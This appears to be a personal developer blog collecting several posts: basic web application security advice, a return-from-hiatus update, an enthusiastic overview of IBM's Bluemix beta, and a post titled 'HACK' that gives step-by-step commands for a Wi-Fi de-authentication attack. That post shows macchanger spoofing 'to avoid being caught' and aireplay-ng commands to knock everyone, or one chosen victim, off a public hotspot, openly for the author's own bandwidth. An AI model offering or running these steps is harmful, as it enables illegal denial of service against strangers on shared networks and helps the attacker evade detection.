Web Application Security: A must read for developers

There are people who spend their whole time trying to screw your web  application. Many ninjas have suffered from the hands of the black hats. Luckily i happen to be a white hat.
There are so many aspects to consider in making you web application secure. The Open Web Application Security Project (OWASP) have compiled a comprehensive list of known security issues and methods to protect yourself against them.
Some of the basic precautions you can take include:

Password Hashing 

Almost everyone build a web application that requires users to login with a username and a password. The credentials are stored in the database and retrieved when a user logs in.
It is important that you properly hash passwords before storing them. Password hashing is an irreversible, one way function performed against the user’s password. This means you can compare a hash against another to determine if they both came from the same source string, but you cannot determine the original string. If passwords are not hashed and your database is accessed by an unauthorized third-party, all user accounts are now compromised. Some users may (unfortunately) use the same password for other services. Therefore, it is important to take security seriously.

Sanitization

Sanitization is a way of ensuring that illegal or unsafe characters are removed from foreign input.
For example, you should sanitize foreign input before including the input in HTML or inserting it into a raw SQL query. When you use bound parameters with PDO, it will sanitize the input for you.

Data Filtering

Its is very bad for any app to accept foreign data without doing checks on it. So make sure you sanitize and validate foreign input before accepting it to you code.
While foreign data can be stored, combined, and accessed later, it is still foreign input. Every time you process, output, concatenate, or include data in your code, ask yourself if the data is filtered properly and can it be trusted. Data may be filtered differently based on its purpose. For example, when unfiltered foreign input is passed into HTML page output, it can execute HTML and JavaScript on your site! This is known as Cross-Site Scripting (XSS) and can be a very dangerous attack. One way to avoid XSS is to sanitize all user-generated data before outputting it to your page by removing HTML tags with the strip_tags function or escaping characters with special meaning into their respective HTML entities with the htmlentities or htmlspecialchars functions.

Validation

Validation ensures that foreign input is what you expect. For example, you may want to validate an email address, a phone number, or age when processing a registration submission.

Error Reporting

Error logging can be useful in finding the problem spots in your application, but it can also expose information about the structure of your application to the outside world. To effectively protect your application from issues that could be caused by the output of these messages, you need to configure your server differently in development versus production (live).

Configuration files

When creating configuration files for your applications, best practices recommend that one of the following methods be followed:

• It is recommended that you store your configuration information where it cannot be accessed directly and pulled in via the file system.
• Information in configuration files should be protected accordingly, either through encryption or group/user file system permissions

 

HACK: Bully everyone from using any wifi hotspot.

With this cold i cannot imagine someone giving me very hot coffee with slow Internet. I bet the consequences are unbearable.

Today in the morning i went to the coffee shop to get one cup before heading to office, there were several shops but the "free wifi" label attracted me. I decided to remove my computer to finish leeching some torrents. But the shock that fell on me was devastating and unberable. You could imagine how a married man who codes and has kids looks like if the kid pours coffee on the keyboard.
That's how i felt.
Anyway i decided to throw everyone else out of the network (its illegal i guess).

I will give you a step by step procedure on how you can do that. Script kiddies you might be very unlucky though.

This attack is referred as De-authentication attack. I am not liable or responsible for anything you may do with this information

Requirements:
1. Brewed coffee that can last the whole day. This is because you will enjoy the speeds when no one else is using the "free wifi".
2. You must be running on Linux platform.
3. Macchanger. ( sudo apt-get install macchanger)

4. Aircrack-ng. ( sudo apt-get install aircrack-ng)

5. Airplay-ng. ( sudo apt-get install aircrack-ng)
6. Wifi card that can be put into monitor mode.
Step X co
first we need to check if you wifi card is communicating properly with your machine.
Open a terminal and pass the following command

sudo airmon-ng

 this is the result

Next we will have to create our monitor interface, then fake our MAC address to avoid being caught.replace interface with the name of your interface, mine is wlan0

airmon-ng stop

ifconfig interface down

macchanger —mac 00:11:22:33:44:55 interface

airmon-ng start interface

Step X do
Now its time for action. using aireplay-ng we are going to pick the mac address of the hotspot we want to attack. Now run this command

aireplay-ng -0 1 -a bssid monitorinterface

To stop the process use ctrl-c, but you do this when you can no longer take more coffee.
Just incase you want to kick an hater out of the network you will use a different command.

aireplay-ng -0 1 -a bssid -c victimmac interface

I think we are done, now you can enjoy fast internet without bothering about others.
Wifi admins am so sorry but their is no other way you can prevent this. Just halla me for help. :-(

ITS GOOD TO BE BACK.

Been really a long time since i started contemplating about writing this blog, Laziness crawled my way and been in a serious war to ensure everything is back to normal. Am not sure if its back. But anyway i want to share some few lessons i learnt while i was away.

This will also serve as a guide towards the next articles i will be publishing.
So #whileiwasaway:

• I learn't java in a night. But with some few grams of coffee and watts .
• I was scared when i was asked about linked list and arrays. You got to because its something you use daily but cant really define it.
• Went for a rally and just tried to imagine the future of machine intelligence.
•  I fell in love. It showed me logic doesn't apply everywhere.

Too much stories won't help us. But in the next few days i will try and focus in dissecting some of the lessons above and how we can use them to solve problems in the real world.

But today i just wanna leave you with some question.

Recently we have witnessed the growth of  mobile money, what do you think is its future, and does other electronic money i.e bitcoin pose a threat to it?

If you delete My Computer, will you computer disappear?

Codename:Bluemix My new Love.

It couldn't be this simple to deploy my application to the cloud in just some few seconds. Its not only exciting but tremendous.
Codename:Bluemix is an implementation of IBM’s Open Cloud Architecture, based on Cloud Foundry(cloud computing Platform as a service software) to enable developers to rapidly build, deploy, and manage their cloud applications, while enjoying the availability of several services, runtime and frameworks.
 IBM will provide services and runtimes into the ecosystem based on our extensive software portfolio.
The product is at beta stage and currently available for developers to test it free of charge asin 'free as beer'.
Being an enthusiast of the new product i have been trying to explore some of it main goals and it happens to be so brief and understandable. They say that bluemix will be able to:

1. Reduce time for application/infrastructure provisioning.
2. Allow for flexible capacity.
3. Help to address any lack of internal tech resources.
4. Reduce Total Cost of Ownership (TCO)
5. Accelerate exploration of new workloads – social, mobile, big data.

This is the look and feel of the Dashboard.

For all developers out their interested in signing up for the beta, use this link https://ace.ng.bluemix.net/
I will take you step by step through the process of uploading your PHP application to bluemix.
Some of the other Capabilities bluemix has include Java, mobile backend development, application monitoring, as well as capabilities from ecosystem partners and open source — all through an as-a-service model in the cloud.